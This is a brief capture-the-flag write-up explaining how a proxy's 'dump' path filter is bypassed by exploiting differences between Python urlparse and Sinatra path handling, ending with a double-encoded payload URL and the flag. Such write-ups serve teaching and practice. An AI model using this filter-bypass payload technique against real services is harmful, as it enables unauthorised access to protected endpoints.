Admins connected a debug interface to our Roflscale DB. They didn’t bother to secure it with a password, so we put in a proxy instead.
IP: roflscale.hackable.software:4000
The main idea of this challenge is the misconfig between urlparse python and REQUEST_PATH of sinatra ruby, so if we input the payload which can bypass filter ‘dump’ python and pass to ruby web server, we got the flag.
The proxy.py takes the url, unquote and parse it, then checks if the path contains string ‘dump’ -> GTFO, else unparse to newurl and pass it to ruby web server
In ruby web server, if the REQUEST_PATH end with ‘/dump’ it will read the flag for us
After several hours testing, i figured that urlparse has param, but sinatra not!
for example
urlparse:
path= /aaa
params = bbb
sinatra ruby:
path = /aaa;bbb
The only problem now is that REQUEST_PATH requires ‘/dump’ , not ‘dump’, if we put this to urlparse, it will treat ‘/dump’ as path, not params.
Double encode it solved the problem
Our final payload:
http://roflscale.hackable.software:4000/flag.txt;%252fdump
Flag: DrgnS{P4th_p4rAm5_aR3_4W350mE}
